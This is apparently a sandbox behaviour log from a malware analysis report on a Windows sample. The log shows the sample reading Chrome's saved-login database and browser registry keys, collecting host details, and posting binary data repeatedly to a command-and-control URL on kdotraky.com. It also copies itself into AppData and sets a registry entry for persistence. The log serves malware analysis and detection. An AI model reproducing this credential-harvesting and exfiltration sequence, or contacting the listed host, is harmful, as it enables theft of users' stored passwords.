Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey, value_name = CurrentVersion False 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey, value_name = CurrentVersion False 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock, value_name = CurrentVersion False 1
Fn
Module Load module_name = SHELL32, base_address = 0x76100000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = SHELL32, base_address = 0x76100000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 18432, size_out = 18432 True 1
Fn
Data
Module Load module_name = shlwapi, base_address = 0x76f10000 True 13
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete False 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Registry Enumerate Keys - False 1
Fn
System Sleep duration = 10 milliseconds (0.010 seconds) True 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - False 1
Fn
Registry Enumerate Keys - False 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = NETAPI32, base_address = 0x75510000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NetUserGetInfo, address_out = 0x754c1be2 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 3
Fn
System Get Info type = Hardware Information True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 2
Fn
DNS Resolve Name host = kdotraky.com, address_out = 101.99.75.184, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 101.99.75.184, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 248, size_out = 248 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = kdotraky.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php True 1
Fn
Inet Send HTTP Request headers = content-length: 266, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php True 1
Fn
Data
Socket Send flags = NO_FLAG_SET, size = 266, size_out = 266 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4048, size_out = 179 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb, size = 4 True 1
Fn
Data
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 2
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.lck True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = NETAPI32, base_address = 0x75510000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NetUserGetInfo, address_out = 0x754c1be2 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 3
Fn
System Get Info type = Hardware Information True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 3
Fn
DNS Resolve Name host = —‹‹ÅÐД›‹ž”†Ñœ’Ћš’Ð¯ž‘š“Й–‰šÐ™šÑ—, service = 80 False 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 2
Fn
DNS Resolve Name host = kdotraky.com, address_out = 101.99.75.184, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 101.99.75.184, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 248, size_out = 248 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = kdotraky.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php True 1
Fn
Inet Send HTTP Request headers = content-length: 194, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php True 1
Fn
Data
Socket Send flags = NO_FLAG_SET, size = 194, size_out = 194 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4048, size_out = 179 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
File Move source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.exe, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 7
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\������Д�������ќ��Ћ���Я����Й���Й��я��, value_name = 98E541, data = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.exe True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 1
Fn
Module Load module_name = user32, base_address = 0x75930000 True 1
Fn
Module Load module_name = NETAPI32, base_address = 0x75510000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NetUserGetInfo, address_out = 0x754c1be2 True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 3
Fn
System Get Info type = Hardware Information True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 2
Fn
DNS Resolve Name host = kdotraky.com, address_out = 101.99.75.184, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 101.99.75.184, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 248, size_out = 248 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = kdotraky.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php True 1
Fn
Inet Send HTTP Request headers = content-length: 167, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php True 1
Fn
Data
Socket Send flags = NO_FLAG_SET, size = 167, size_out = 167 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4048, size_out = 157 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 3
Fn
DNS Resolve Name host = —‹‹ÅÐД›‹ž”†Ñœ’Ћš’Ð¯ž‘š“Й–‰šÐ™šÑ—, service = 80 False 1
Fn
Module Load module_name = ADVAPI32, base_address = 0x77330000 True 5
Fn
Module Load module_name = shlwapi, base_address = 0x76f10000 True 2
Fn
DNS Resolve Name host = kdotraky.com, address_out = 101.99.75.184, service = 80 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 101.99.75.184, remote_port = 80 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 248, size_out = 248 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = kdotraky.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php True 1
Fn
Inet Send HTTP Request headers = content-length: 167, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php True 1
Fn
Data
Socket Send flags = NO_FLAG_SET, size = 167, size_out = 167 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4048, size_out = 157 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Thread 0xa9c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Thread 0xb7c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = shlwapi, base_address = 0x76f10000 True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image